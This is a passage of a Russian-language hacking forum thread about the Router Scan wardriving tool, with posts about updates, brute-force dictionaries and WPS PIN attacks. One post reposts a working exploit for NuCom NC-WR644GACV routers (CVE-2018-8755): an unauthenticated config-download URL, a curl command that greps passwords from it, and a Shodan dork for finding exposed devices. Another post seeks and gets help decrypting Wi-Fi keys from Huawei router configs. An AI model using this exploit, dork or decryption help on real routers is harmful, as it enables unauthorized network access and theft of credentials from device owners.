прога Router Scan

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by СЕРЖ32, 11 Nov 2013.

  1. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,935
    Likes Received:
    7,340
    Reputations:
    95
    В первой мало смысла, для неё нужно быть залогиненным (почитайте внимательно код). Хотя может быть можно её приспособить для вытаскивания пароля админа при заходе юзером, но не думаю, что это будет так просто...

    Вторая вообще для UPnP, а не для веб морды роутера.
    Определение поправил, там всё было предельно просто. :) Но на всех трёх IP уязвимость закрыта.
     
    sha9, Triton_Mgn, Kakoluk and 3 others like this.
  2. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    75
    Reputations:
    51
    А где брать поправленые версии? Они обновляются на сайте http://stascorp.com/load/1-1-0-56? И как правильно их обновлять?
     
  3. ms13

    ms13 Level 8

    Joined:
    19 Jun 2015
    Messages:
    1,868
    Likes Received:
    7,087
    Reputations:
    100
    @4ikotillo

    Если не ошибаюсь, то самые новые всегда тут!
     
    sha9, Toroid, hunt.lsk and 5 others like this.
  4. 4ikotillo

    4ikotillo Elder - Старейшина

    Joined:
    29 Jun 2008
    Messages:
    444
    Likes Received:
    75
    Reputations:
    51
    Отлично! Спасибо, большое! =)
     
  5. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    531
    Likes Received:
    653
    Reputations:
    1
    простите за нескромный вопрос, а зачем вам лично понадобились инструменты для вардрайвинга,бэкдоры под туполинк и прошивки опеврт если вы такой законопослушный гражданин? коли охота сойти за правоборца, хотя бы удалите свои сообщения на форуме (по крайней мере некоторые из них):)


    п.с. не учите меня жить,лучше помогите материально (о.бендер) :p:D:D
     
    #6205 sha9, 4 Jul 2018
    Last edited: 4 Jul 2018
    Majgap, Gashek, Veil and 1 other person like this.
  6. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    531
    Likes Received:
    653
    Reputations:
    1
    эксплойт роутера NuCom NC-WR644GACV
    Overview
    ========
    Researchers of NVEL4 Cybersecurity company have discovered that it is
    possible to access to the config file bypassing admin authentication and
    authorization. The vulnerability has been reported to the vendor. The
    vendor has confirmed the vulnerability but not issued to security advisory.

    The recommendation to affected users is to update to the latest available
    version and change the credentials used, since they could have been
    extracted.

    Some NuCom routers are exposed to internet.
    Product Details
    =============
    * Type: Router / Access Point (Wireless Dual Band Gigabit VoIP Router)
    * Vendor: NuCom
    * Model Name: NC-WR644GACV
    * Vulnerable Software Version: <= STA 005
    * Fixed Software Version: STA 006

    Vulnerability Details
    ===================
    * CVE: 2018-8755
    * Name: Unauthenticated Configuration File Download
    * Type: Authentication / Authorization Bypass
    * Description: An unauthorizated user can download config file by
    accessing to the URL directly
    * Payload: http://[hostname]/cgi-bin/config_download.cgi?action=download
    * Impact: By downloading the config file an attacker can read all
    password stored in plain-text and base64 then access vie web as
    administrator and gain privileged control of the device.

    PoC
    ====

    [email protected]:~$ curl -s "http://vulnerable.hostname/
    cgi-bin/config_download.cgi?action=download"|strings|grep -i password
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password_realtext=[PLAIN
    PASSWORD HERE]
    InternetGatewayDevice.WANDevice.2.WANConnectionDevice.1.
    WANPPPConnection.1.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password_realtext=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.5.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.1.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.X_CT-COM_UserInfo.UserList.2.Password=[SHA256
    PASSWORD HERE]
    InternetGatewayDevice.LANDevice.1.WLANConfiguration.1.WPS.PeerPassword=[PLAIN
    TEXT PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.Password=[BASE64 PASSWORD HERE]
    InternetGatewayDevice.ManagementServer.ConnectionRequestPassword=[BASE64
    PASSWORD HERE]
    [email protected]:~

    шодан дорк
    NC-WR644GACV
     
    Kakoluk, Mednik, hydra and 5 others like this.
  7. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    522
    Likes Received:
    706
    Reputations:
    4
    to binarymaster.
    А можно ли добавить в секции настроек файлов авторизации, дурацкую кнопку "Перезагрузить словари"?
    Дело в том, что не редко приходится редактировать/менять словари "на ходу", не останавливая сканирования, и приходится выбирать файлы пар(проводник) и применять. Не особо удобно, если словари прежние, но только что отредактированы.
    Понимаю, мелко. Но если не трудно, сделайте плиз. :)
     
    sha9 and startless like this.
  8. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,935
    Likes Received:
    7,340
    Reputations:
    95
    В последней ночной сборке словари перезагружаются при открытии окна настроек по нажатию OK.
     
    sha9, startless, CRACK211 and 9 others like this.
  9. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    522
    Likes Received:
    706
    Reputations:
    4
    Прошу помощи при расшифровке PSK из конфигов Huawei Technologies HG8245H hv 494.E sv V3R016C00S102.
    https://yadi.sk/d/Ab1F6mZN3YrJYk
     
    #6209 Kakoluk, 6 Jul 2018
    Last edited: 7 Jul 2018
  10. Felis-Sapiens

    Felis-Sapiens Reservists Of Antichat

    Joined:
    21 Jul 2015
    Messages:
    569
    Likes Received:
    3,257
    Reputations:
    115
    hw_ctree.xml - 074318473
    hw_ctree(1).xml - 37111111
     
    sha9, CRACK211, binarymaster and 6 others like this.
  11. muroslavvv

    muroslavvv New Member

    Joined:
    21 Jun 2018
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Нажать скачать или скачать пре-релиз ? В шапке*
     
  12. robert

    robert Member

    Joined:
    9 Mar 2018
    Messages:
    4
    Likes Received:
    8
    Reputations:
    0
    Хмм.... ТП везде ТП. Где здесь кнопка "Без баб"/"Избавить от женских сообщений"?
     
    sha9 likes this.
  13. sha9

    sha9 Well-Known Member

    Joined:
    25 Sep 2015
    Messages:
    531
    Likes Received:
    653
    Reputations:
    1
    комичность ситуации не в этом
    но согласно писанию, лицемерие еще больший грех. ;):D:D:D
     
    DSL2650NRU and Gashek like this.
  14. igrek

    igrek Member

    Joined:
    20 Aug 2016
    Messages:
    78
    Likes Received:
    52
    Reputations:
    1
    Добрый вечер всем.
    Я извиняюсь за ламерский вопрос, как в роутер скане (под виндой) сделать это : "прогнать pixiewps в --force режиме."
     
  15. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,935
    Likes Received:
    7,340
    Reputations:
    95
    Запустить из командной строки с нужными аргументами.
     
  16. igrek

    igrek Member

    Joined:
    20 Aug 2016
    Messages:
    78
    Likes Received:
    52
    Reputations:
    1
    Спасибо, но я думал, что где то в меню "More" есть пункт а я его просто не нахожу.
    И ещё - в последнем варианте программы (скачал 2 июля) стал появляться вот такой сбой https://ibb.co/nNpXcT
    В июньской такого нет, но правда и пин не находит.
     
  17. Kakoluk

    Kakoluk Well-Known Member

    Joined:
    14 Aug 2015
    Messages:
    522
    Likes Received:
    706
    Reputations:
    4
    Это что-то субъективное(местное). Могу поручится собственной репутацией(всей что есть), что binarymaster совершенно ни при чём.
    Проверьтесь на зверьков(и роутер тоже проверьте).
    И если найдёте, это уже повод задуматься кому вы доверяете, и что делать дальше. :rolleyes:
    И если вы про эмуляторы, то, это тоже к "эмуляторщикам". :)
    - Пишет значит человек код в среде, а тут ему в вину ставят что он не следит за внесредным окружением(да плевать на *nix-сы, - консоли что ли не видали? :D).
     
    #6217 Kakoluk, 12 Jul 2018 at 1:05 AM
    Last edited: 12 Jul 2018 at 1:17 AM
    sha9 likes this.
  18. tigos1

    tigos1 Member

    Joined:
    25 Dec 2016
    Messages:
    24
    Likes Received:
    8
    Reputations:
    0
    Получилось что-то типа обращения к binarymaster:

    Проверил метод от AlexDAF
    Метод - вполне рабочий, но не легкий.
    Для него нужно иметь под рукой свободный микрот, либо ставить эту эмуляцию..

    Я не первый и не последний из форумчан, кто просил и попросит Вас добавить эту опцию.
    Понимаю, что программирование такого софта - дело не легкое, тем более - настолько качественно сделанного, что работает буквально с нажатия на кнопку.

    Вы в своей программе избавили всех ламеров и лентяев, даже от мыслишки о том что надо копаться в нете для поиска уязвимости.
    Нажал и - пошло!

    Просто микроты, настолько качественно делают свое оборудование, и оно настолько хорошо работает, что появляется везде.
    Теперь это - не только предприятия, теперь это - практически каждый 5й сосед за стеной..)

    Очень, очень был бы (и уверен меня поддержат в этой просьбе) признателен за добавление этой модификации.

    И - ещё раз, спасибо за отличный продукт, хоть Вы и держите его в "бетах"!
     
  19. igrek

    igrek Member

    Joined:
    20 Aug 2016
    Messages:
    78
    Likes Received:
    52
    Reputations:
    1
    Никому ничего не ставил в вину, просто сообщил, возможно не совсем корректно,-не указал свою конфигурацию.
    мой конфиг: ноуты разные (3 штуки) на всех вин 7 32 бит
    свисток - ASUS N14 Ralink RT5372.
    Сбой происходит только на этом свистке и только на роутерах
    Тенда RTL8xxx и TP-LINK Archer_C60 1.0 у обоих WPS Lock.
     
    sha9 and Kakoluk like this.
  20. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    3,935
    Likes Received:
    7,340
    Reputations:
    95
    Тут очень спорный момент. :D
    А вот это важная деталь.
     
    sha9 likes this.
Loading...